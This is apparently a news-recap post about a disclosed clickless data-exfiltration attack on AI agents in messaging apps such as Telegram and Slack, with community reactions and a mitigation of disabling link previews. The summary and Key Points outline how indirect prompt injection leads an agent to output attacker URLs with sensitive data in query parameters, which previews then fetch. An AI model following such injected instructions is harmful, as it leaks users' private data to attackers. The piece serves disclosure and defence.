February 9, 2026
Clickless leaks, endless shrieks
Data exfil from agents in messaging apps
Link previews are leaking your secrets — community drags OpenClaw on Telegram
TLDR: AI agents in chat apps can leak your data instantly via auto “link previews,” with OpenClaw on Telegram called out as vulnerable unless previews are disabled. The community cheered the warning, debated OpenClaw’s defenses, and clowned on messy demos—bottom line: turn off previews or your bot may overshare.
AI chatbots in your DMs are apparently spilling tea you never meant to pour. The big reveal: messaging apps like Slack and Telegram auto-load “link previews,” which can quietly send your info to an attacker’s site the moment an AI agent replies — no clicks needed. The community’s reaction? Spicy. Security folks cheered the wake-up call, with wunderwuzzi23 dropping a “Correct, good to see this get more coverage” and linking prior research on unfurling and mitigations (read it). Engineers debated whether OpenClaw deserves the heat: ChatEngineer insisted the framework was built with this threat in mind (sandboxed runs, isolated browser profiles), but admitted preview quirks can bite when Telegram’s defaults are on.
tiny-automates called the attack “elegant,” because link previews were designed for trusted human senders — and once a bot generates the message, that trust “breaks completely.” Meanwhile, OkayPhysicist threw shade at AITextRisk’s demo, flagging that their input boxes got spammed with unfiltered garbage, stirring a side-drama about hygiene while everyone’s secrets might be flying out the door. The fix? Turn off previews (OpenClaw’s linkPreview: false) and test your setup on AITextRisk.com.
The memes write themselves: “Link previews are snitches,” “My bot just aired my diary before I hit send,” and “Disable previews like duct tape for webcams.” Welcome to clickless leaks, folks.
Key Points
- •Messaging apps’ link previews can automatically exfiltrate sensitive data from LLM-generated messages without user clicks.
- •Indirect prompt injection can make an AI agent output attacker-controlled URLs with sensitive data in query parameters.
- •OpenClaw is vulnerable via Telegram’s default configuration; disabling Telegram link previews mitigates the issue.
- •Preview generation triggers a network request to the attacker’s domain, exposing any sensitive data included in the URL.
- •AITextRisk.com provides tools to test agent/app pairings, view preview logs, and track common preview scrapers.